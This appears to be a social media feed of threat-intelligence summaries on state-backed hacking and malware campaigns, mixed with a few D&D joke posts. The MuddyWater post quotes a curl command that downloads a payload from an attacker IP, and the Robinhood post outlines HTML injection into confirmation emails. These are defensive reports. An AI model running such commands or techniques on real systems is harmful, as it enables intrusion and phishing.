N Shams

Pendar Kooshk Imen Company (PKIC) was hacked by an unknown threat actor, breaching its connection to Iran’s banking sector and compromising financial information for millions of Iranian’s. With this being the third major incident within Iran’s banking sector in the last 2 months. Those affected by the compromise are: •Banks (Melli, Sepah, Mellat, Tejerat, Middle East) •Polyacryl Iran Company (polyacryliran[.]ir, polyacryl[.]ir, polyacryliran[.]com) •Fipcoran (fipcoran[.]com) •Multiple government and private entities No known attribution is associated with this group, other than a transparent watermark of roses upon fire covering screenshots provided demonstrating the groups access within PKIC systems, acting as a major threat to every organization using these services. Those same screenshots display software appearing to be authentic versions of ESXi, pfSense, Gitlab, and DSS Server used by their customers. Having complete access into PKIC's infrastructure to: •Access to virtualization platform managing PKIC server infrastructure (ESXi) •Compromised customer credentials (i.e: Polyacryl Iran) •Core cryptographic service APIs used in PKI operations •Control over customer web hosting (185[.]110[.]188[.]10:2222) •PKIC's internal source code (Totaling 1.1 GB of files) •Multiple administrative accounts exposed (i.e: e[.]sharifi[@]pki[.]co[.]ir) PKIC’s compromise means attackers potentially access transaction systems, account data, and authentication infrastructure, everything those digital locks protect and opening up the opportunity for spear phishing attacks using compromised emails (polyacryliancompany[@]gmail[.]com). This hack places risk to Iranian banks, and those who use them. #ThreatIntel #Cyber #CyberSecurity #CyberSecurityNews #Iran #PKIC github.com/SetarehganAzad…

FamousSparrow (aka Earth Estries), a China-aligned Advanced Persistent Threat (APT) group, launched a multi-wave intrusion campaign targeting an Azerbaijani oil and gas company from late December 2025 through late February 2026. With the attack most notably using an evolved DLL sideloading technique in order to override two specific exported functions within the malicious library. Attribution comes from the substantial overlap with the Earth Estries toolset and tradecraft. Such as post-compromise command execution, DLL sideloading, Deed RAT deployment, Mofu-based staging, and Terndoor-style driver-backed behavior. When taken together it gives a intrusion chain that is consistent with FamousSparrow's ecosystem of tools. The operation was characterized by the deployment of two distinct backdoor families, Deed RAT and Terndoor, which were utilized across three separate waves of activity. With the initial detection of intrusion dating back to December 25, 2025, when the `w3wp.exe` process attempted to write a malicious web shell into a publicly accessible directory on the Exchange server. Leaving the back doors latent in infected systems after the cleanup. The next stage of the intrusion began with the execution of `C:\TEMP\LMIGuardianSvc[.]exe` (MD5: 0554f3b69d39d175dd110d765c11347a), which sideloaded `C:\TEMP\lmiguardiandll[.]dll`. That DLL initiated the execution chain of a backdoor later identified as `Deed RAT`. With it delivered through a three-component chain that blends seamlessly into the legitimate `LogMeIn Hamachi` ecosystem: • LMIGuardianSvc.exe: Legitimate LogMeIn Hamachi binary (MD5: 0554f3b69d39d175dd110d765c11347a) • LMIGuardianDll.dll: Malicious loader that patches a Windows API and stages the payload • .hamachi.lng: Encrypted Deed RAT payload The second stage occurs later, when `LMIGuardianSvc.exe` continues its normal execution and eventually calls the `ComMain` export. From there, the legitimate service flow leads to a call to `StartServiceCtrlDispatcherW`. Because that API was previously patched during `Init`, the call is transparently diverted into the malicious loader function. The loader then restores the original bytes of `StartServiceCtrlDispatcherW`, ensuring that the hook is removed after use. The `.hamachi.lng` file contains the next-stage shellcode along with the `Deed RAT` payload. It is decrypted using AES-128 in CBC mode with an initialization vector of 16 null bytes. The decryption key is derived from the first 16 bytes of the file, while the remainder represents the encrypted payload. Once decrypted, the shellcode is executed directly in memory, completing the transition from staged components to an active backdoor. This intrusion should not be viewed as an isolated compromise, but as a sustained and adaptive operation conducted by an actor that repeatedly sought to regain and extend access within the victim's environment. #ThreatIntel #Cyber #CyberSecurity #CyberSecurityNews #APT businessinsights.bitdefender.com/famoussparrow-…

`Open-OSS/privacy-filter`, a popular artificial intelligence repository on Hugging Face, turned out to be a malicious package that disguised itself as a legitimate privacy filtering tool. With the attacker's primary target was Windows machines. The model card used was nearly verbatim from OpenAI’s own Privacy Filter project, and they boosted their initial numbers to 244 downloads and 77 likes in under one hour. With the artificially inflated numbers used to push the repository into the spotlight and attract more victims. Once installed on the machine, it would act as normal, and in the background, install a `startbat` file on Windows, or a Python `loaderpy` script on Linux or macOS. A decoy piece of code that looked like a real loader then called a function named `verifychecksumintegrity`, which disabled SSL verification, decoded a base64-encoded URL pointing to `jsonkeeper[.]com`, fetched a JSON document, and extracted the `cmd` field. That command was passed directly to `PowerShell`, running silently with execution policy bypassed. It would then in the following order: • Create Microsoft Defender exclusions • Created a scheduled task named `MicrosoftEdgeUpdateTaskCore` for persistence • Install a 10 MB Rust-based infostealer Once it was active, the infostealer would then go through the host machine launching eight parallel collection modules targeting: •Chrome and Firefox browser cookies •Login data • Saved passwords • Session cookies • SSH keys • VPN configurations • FTP credentials • cryptocurrency wallet files. All stolen data was then compressed and sent to a command-and-control server at recargapopular[.]com using a `POST` request with a Bearer token authorization header. This attack is possibly linked to the same unknown attacker account who on April 24, 2025, had to six other repositories uploaded that contained nearly identical loader functionality. #ThreatIntel #Cyber #CyberSecurity #CyberSecurityNews #HuggingFace #LLM #AI #OpenAI bleepingcomputer.com/news/security/…

@Demoncoon @AvantrisLegends To a similar effect prestidigitation lets you soil an object, you could cast piss yourself in the middle of the bbeg monologue.

@AvantrisLegends Fun fact: With the spell Presdigitation, which is a Cantrip mind you, you can make any liquid smell and taste like piss. I've used the spell before to create a minor sound effect behind an annoying fellow player and add the smell of a fresh fart! ;)

D&D Animated: A Flagon of WHAT??? 🤣 #dnd #ttrpg #dnd5e

Just asking for a friend #DnD

OceanLotus (aka APT32), a Vietnam-aligned hacking group, has infected three packages on the Python Package Index (PyPI) repository, designed to stealthily deliver a previously unknown malware family called `ZiChatBot`. • `uuid32-utils` (1,479 downloads) • `colorinal` (614 downloads) • `termncolor` (387 downloads) Current attribution comes from Kaspersky who says this current attack has a "64% similarity" to OceanLotus. Similar methods were used like poisoned Visual Studio Code projects for previous attacks. All three packages were uploaded to PyPI between July 16 and 22, 2025. With both `uuid32-utils` and `colorinal` using similar `ZiChatBot` payloads, while `termncolor` uses `colorinal` as a dependency. Once the package installs it will extract: • `terminate.dll` (establishes auto-run entries for `Windows`, and run code to delete itself from the host) • `terminate[.]so` (establishes the malware for `Linux` in crontab, and /tmp/obsHub/obs-check-update") Regardless of the operating system it's running on, `ZiChatBot` is designed to execute shellcode received from its C2 server. After executing the command, the malware sends a heart emoji as a response to signal the server that the operation was successful. If the PyPI supply chain campaign is indeed the work of OceanLotus, it represents the threat actor's strategy to expand its targeting scope. #ThreatIntel #Cyber #CyberSecurity #CyberSecurityNews #APT32 #OceanLotus thehackernews.com/2026/05/pypi-p…

In early 2026, MuddyWater (Seedworm), a Iranian state backed threat group, operated under the banner of the Chaos ransomware-as-a-service (RaaS) group, using it to obfuscate ransonware attacks. With Microsoft Teams being the main attack vector, where they used interactive screen-sharing to: • Harvest credentials • Manipulate Multi-Factor Authentication (MFA) Initial attribution comes from MuddyWater adopting alternative ransomware branding, in an effort to reduce attribution and maintain plausible deniability. With the apparent absence of file encryption, representing a deviation from typical ransomware behavior, the inconsistency indicates that the ransomware component may have functioned primarily as a facilitating or obfuscation mechanism. Initial access came from leveraging Microsoft Teams, where the threat actor engaged employees through external chat requests. Using a interactive screen-sharing exploit to compromise users. The attacker then conducted initial discovery, harvested credentials, including MFA manipulation, and quickly transitioned to using legitimate accounts for internal access. They then established persistence using remote access tools such as `DWAgent` and `AnyDesk`, before deploying additional payloads and further control of the environment. The TA would later execute commands via `RDP` to download additional payloads using curl: • `curl hxxp[://]172.86.126[.]208:443/ms_upd[.]exe -o C:\ProgramData\ms_upd[.]exe` Following this, the TA exfiltrated data from the compromised environment and subsequently contacted the victim via email, claiming data theft and initiating ransom negotiations. The assessed link to MuddyWater indicates a continued evolution in the group’s operational approach, including the apparent use of RaaS ecosystems and branding to obscure attribution. This aligns with broader trends in which state-aligned actors adopt criminal tactics to introduce ambiguity and delay defensive response. #ThreatIntel #Cyber #CyberSecurity #CyberSecurityNews #APT #IranAPT #IranWar rapid7.com/blog/post/tr-m…

Silver Fox (also known as CL-STA-0048), a threat group based in China, has been linked to a new campaign, using a previously undocumented backdoor called `ABCdoor`, targeting organizations in Russia and India with phishing attacks using: • ABCDoor (Previously undocumented Python backdoor) • ValleyRAT (Functions as a loader for ABCDoor) • RustSL (Open-source shellcode loader and antivirus bypass framework. Unpacks the encrypted malicious payload) The starting point of the attack chain is a phishing email containing a PDF file, which features two clickable links a ZIP or RAR archive hosted on `abc.haijing88[.]com`. Once clicked `ABCDoor` gets unpacked and loaded into the host system. (With newer versions of `RustSL` expanding to include the geographic region of Japan.) `ABCDoor` establishes persistence through Windows Registry Run keys and scheduled tasks, then communicates with its command-and-control (C2) servers over HTTPS using asynchronous Socket[.]IO messaging. Then running under a legitimate `pythonw.exe` process to evade detection. The malware focuses on covert remote interaction capabilities: • Multi-monitor screen streaming via FFmpeg • Remote mouse and keyboard control • Clipboard theft • File operations • Limited file-encryption features • Self-updating and self-removal • Collects extensive host metadata However, it leaves forensic artifacts in the registry and `%LOCALAPPDATA%` directories that defenders can monitor for detection. While primarily focused on targeting organizations in Taiwan, North America and Japan, the recent campaign is significant in that it shows the group expanding its regional focus for the first time to targets in Russia and India. #Malware #CyberSecurity #CybersecurityNews #ThreatIntel #SilverFox #APT #China darkreading.com/endpoint-secur…

313 Team (Iranian-aligned Iraqi hacktivist group) is disrupting Canonical’s Ubuntu web infrastructure, putting it under a sustained DDoS attack. Escalating the disruption into an extortion attempt, making updates and security patching unable to go through. 313 Team carried out similar attacks against Bluesky (April 15–16), Mastodon's flagship server (April 20), and eBay (April 26–27). With messages on Telegram claiming attribution to the attacks. Canonical has confirmed their web infrastructure is under fire. The group explicitly demanding payment to stop the flood of packets, with the sustained DDoS attack beginning over 18+ hours ago and has taken a large portion of Canonical’ Ubuntu servers completely offline. Including: • Downloads • Package repositories • Bug tracking • Code hosting • Authentication systems However, the Core OS and updates remain unaffected, and if you run Ubuntu on your VPS, your local instance is safe. Expect instability when hitting official docs or mirrors if the backend is still being flooded. #ThreatIntel #Cyber #CyberSecurity #CybersecurityNews #Ubuntu #Linux

APT34 (also known as OilRig, and Helix Kitten) is a Iranian state backed threat group, which has now deployed a new attack using LSB steganography to conceal command and control configurations inside Google Drive images. The group has been active since 2014, with known targets going across the Middle East, Europe, Asia, and the United States. Attribution comes from historical APT34 tactics shown through this attack, including the use of: • Excel workbook events • VBA macros with Base64 decoding • Scheduled tasks for persistence. • Persian language comments The attack begins with a malicious Excel file themed around Iranian nationwide protests, using social engineering lures like “Tehran final list” to trick victims into enabling macros. Once macros are enabled, the VBA code decodes C# source code from `CustomXMLParts`. Using the legitimate Windows compiler `csc.exe` to compile it into a malicious loader. This fileless technique helps the malware evade traditional antivirus detection by avoiding dropping pre-compiled executables onto the disk. This campaign represents a significant evolution from OilRig’s earlier operations. Shifting from basic Excel macro-based loaders to sophisticated multi-stage attack chains featuring cloud service abuse, steganographic concealment, and fileless in-memory execution. #ThreatIntel #Cyber #CyberSecurity #CybersecurityNews #APT34 #IranAPT #IranWar gbhackers.com/oilrig-hides-c…

Robinhood users were hit with a new phishing attack taking advantage of Gmail's native `dot alias`, and flaws in Robinhood's account creation process. Sending users to: • robinhood[.]casevaultreview[.]com. Social engineering attacks have accounted for $306 million in losses since the start of 2026. Customers were likely phished using a list of known customer emails from a Robinhood leak in November 2021. The data breach leaked five million email addresses, with the data offered for sale on `Cybercrime Forums`. Attackers abused Robinhood to generate phishing emails by exploiting a flaw in the company's onboarding process that allowed them to inject arbitrary HTML into its account confirmation emails, following these series of steps: 1. "jane.smith@gmail.com.” and "janesmith@gmail.com.” are treated as the same inbox, while Robinhood treats them as different emails. 2. Attacker registers a new Robinhood account using a similar email with or without the period, per account 3. Sets optional “device name” field on Robinhood as HTML 4. Robinhood's "unrecognized activity" email renders it unsanitized, which Gmail treats as formatting instructions. The result is a real email from "noreply@robinhood[.]com" that passes SPF, DKIM, and DMARC. With recipients receiving what appeared to be a standard login alert, but with an embedded phishing section warning of "unrecognized activity" and urging them to review their account. As seen below: #ThreatIntel #Cyber #CyberSecurity #CybersecurityNews bleepingcomputer.com/news/security/…

Pendar Kooshk Imen Company (PKIC) has been hacked, potentially leaving major Iranian banking information compromised. With the recent financial and banking problems in Iran, it needs a deeper analysis. An update will come over the next couple days. Considering banks such as Melli and Sepah were disrupted back in March as well, what will happen now with PKIC’s compromise? #ThreatIntel #cyber #CyberSecurity #CybersecurityNews github.com/SetarehganAzad… t.me/SalsabilNetwor…

Looks like they have a background as a baker. #DnD #RPG #gaming #tabletop

`Firestarter` backdoor survived security patches and firewall updates. Persisting as an active threat on Cisco devices running ASA or Firepower Threat Defense (FTD) software, maintaining post-patching persistence and enabling threat actors to re-access compromised devices without re-exploiting vulnerabilities. The backdoor has been attributed to a threat actor that Cisco Talos internally tracked as UAT-4356, known for cyber espionage campaigns, including `ArcaneDoor`. Using two now patched CVE's to initially get on a system: • CVE-2025-20333 (Allowed remote attacker with valid VPN user credentials to execute arbitrary code as root) • CVE-2025-20362 (Allowed remote attacker to access restricted URL endpoints) Once `Firestarter` nests on the devices, it maintains persistence across reboots, firmware updates, and security patches. Furthermore, the backdoor relaunches automatically if terminated. Persistence is achieved by hooking into LINA, the core Cisco ASA process, and uses signal handlers that trigger reinstallation routines, with copies stored in: • /opt/cisco/platform/logs/var/log/svc_samcore.log • usr/bin/lina_cs Triggered when a process termination signal is received, also known as a graceful reboot. Devices compromised prior to patching may remain vulnerable because `Firestarter` is not removed by firmware updates. With reimaging and upgrading the device using the fixed releases is currently the only guaranteed way remove it. #ThreatIntel #CybersecurityNews #CyberSecurity bleepingcomputer.com/news/security/…

Tropic Trooper is conducting a new campaign targeting Chinese-speaking individuals with a trojanized version of SumatraPDF reader, deploying a custom AdaptixC2 Beacon and abusing VS Code tunnels for remote access. Zscaler ThreatLabz discovered the campaign last month, attributing it to Tropic Trooper (aka APT23, Earth Centaur, KeyBoy, and Pirate Panda), a group known for targeting various entities in Taiwan, Hong Kong, and the Philippines since 2011. The staging server involved in the intrusion 158[.]247[.]193[.]100 was observed hosting a Cobalt Strike Beacon and a custom backdoor called EntryShell, both of which were used by Tropic Trooper in the past. #ThreatIntel #CybersecurityNews #CyberSecurity thehackernews.com/2026/04/tropic…

This is a great idea until the party walks into a dungeon and the DM says "A deep stench of bile and rot permeates through the walls, the corridors stretching away like the entrails of an ancient being" #DnD #RPG #gaming #tabletop

GopherWhisper, a previously undocumented China-aligned APT group, targeted Mongolian government entities and other actors. With their attacks leveraging Discord, Slack, Microsoft 365 Outlook, and file[.]io for command and control (C&C) communications and exfiltration. GopherWhisper was tied to current attacks with previously unattributed malware, identified by `ESET`. This, along with metadata obtained from the C2 server, shows little activity outside the 8 a.m. and 5 p.m. working hour interval which lined up in UTC+8; further attributing the attacks to a Chinese based group. A wide range of tools and implants were used, with Go being the most common language used in creating their malware. Of the seven tools that were discovered, four are backdoors: • LaxGopher (written in Go)c • RatGopher (written in Go)c • BoxOfFriends (written in Go)c • SSLORDoor (written in C++) ESET also found an injector (JabGopher), a Go-based exfiltration tool (CompactGopher), and a malicious DLL file (FriendDelivery). This is part of a continued campaign in Asia, with GopherWhisper and other Chinese based actors escalating attacks. #Malware #CyberSecurity #CybersecurityNews #ThreatIntel #APT eset.com/us/about/newsr…

`The Gentlemen`, ransomware‑as‑a‑service (RaaS), is rapidly gaining popularity. Claiming over 1,570 victims, with the majority of attacks (240) occurring in the first months of 2026. The group's ransomware made in Go affects Windows, Linux, and BSD with ESXi implemented in C. Infrastructure includes: • 45.86.230[.]112 and 91.107.247[.]163 (C2 server) • Ports 443 and later 80 SystemBC (a proxy malware) is directly integrated into `The Gentlemen` ransomware ecosystem. When deployed, SystemBC establishes a SOCKS5 network typically deployed as part of human‑operated intrusion workflows rather than massive targeting. The precise initial access vector has not been conclusively determined, with the earliest known stage of an adversary's presence being on a Domain Controller with Domain Admin–level privileges. From that position, the attacker appeared to have performed systematic credential validation and host accessibility testing across the environment, reflected in an initial pattern of failed network logons followed by successful authentications originating from the Domain Controller. This sequence is consistent with a controlled effort to verify privileged access and identify viable systems before expanding operations more broadly. The attacker then disables Windows Defender real-time monitoring and establishes persistence with: • Stores payload throughout numerous systems under different filenames • Scheduled tasks–based persistence • Service–based persistence Active Directory’s own Group Policy infrastructure can then detonate the ransomware simultaneously on every computer in the domain, compromising every host allowing credential harvesting, followed by various other effects. The culmination of deployments of `The Gentlemen` RaaS payloads is rapidly increasing. `The Gentleman` now blatantly advertising their services across multiple underground forums promoting their ransomware platform and persuading other technical skilled actors to join their group. At this time, it's still unknown where the group is currently based. #Malware #CyberSecurity #CybersecurityNews #ThreatIntel research.checkpoint.com/2026/dfir-repo…

After a quiet period since 2023, Mustang Panda (TA416) reemerged in mid-2025, now targeting India and South Korea in the Indo-Pacific region, using spear-phishing attacks to infect the host machine with a sideloaded DLL. With current known attack vectors being: • Victorcha707@gmail.com (Phishing email) • Impersonated Victor Cha. Cha (former Director for Asian Affairs for NSC) • 72[.]81[.]60[.]97 (Previous C2 Server) Current attribution is Mustang Panda, who favors medium-complexity repeatable execution techniques, most notably the extensive use of DLL sideloading to deploy custom implants (LotusLite) via benign or trusted executables, while demonstrating repeated reuse of infrastructure and tooling. Messages sent to targets in India seem to be disguised as basic IT help desk issues with victims prompted to open a malicious file. Once viewed, the file triggered the sideloading attack with the latest variant of LotusLite featuring some minor edits to more easily evade cybersecurity detection tools. Superficially disguised to mimic legitimate banking software in the region where many of its targets were prompted with the pop-up window message "HDFC Bank". As the malware initiates, it begins to load the binary into memory and executes multiple string-concatenation-based operations. Spawning two functions, one to establish persistence and spawn a decoy file while the other file is responsible for the malware's beaconing functionality. A significant portion of the implant logic is executed before `DllMain` is reached through the Microsoft C Runtime (CRT) initialization, leveraging `_initterm`. Then iterating over a linker-generated array of function pointers (located in .CRT$XC* sections), it invokes each non-null function, initializing an array of functions, sets up values for Mutexes and directory location for persistence, as well as the address for the command-and-control (C2) server. The C2 server relies on Windows `WinHTTP` to connect to its command-and-control server with the currently known packet structure image shown below. When the malware starts it enumerates the names of the machine, along with the target’s username. It then proceeds to execute a predefined set of instructions, which can be dynamically leveraged based on the threat actor’s operational requirements: • Creation of an interactive cmd.exe shell • Terminate the interactive shell • Various file operations •Checks the status of the current beacon and reports back to the C2 server. The malware persists with the following: •Checks the status of the current beacon and reports back to the C2 server reporting on C:\ProgramData\Technology360NB. • SHSetValueA value created under Run Key • Exports two dummy functions known as `EvtNext` and `EvtQuery` Mustang Panda's attacks against India's financial sector are also almost certainly motivated by intelligence gathering, not financial gain. India's banking sector, particularly institutions like HDFC Bank, sitting at the intersection of several strategic intelligence interests. Financial institutions have visibility into cross-border transactions, government-linked accounts, infrastructure financing, and trade flows; all of which are valuable to a state-aligned actor. Access to this type of data can provide insight into capital movement, economic relationships, and internal policy direction. #Malware #CyberSecurity #CybersecurityNews #ThreatIntel darkreading.com/cyberattacks-d…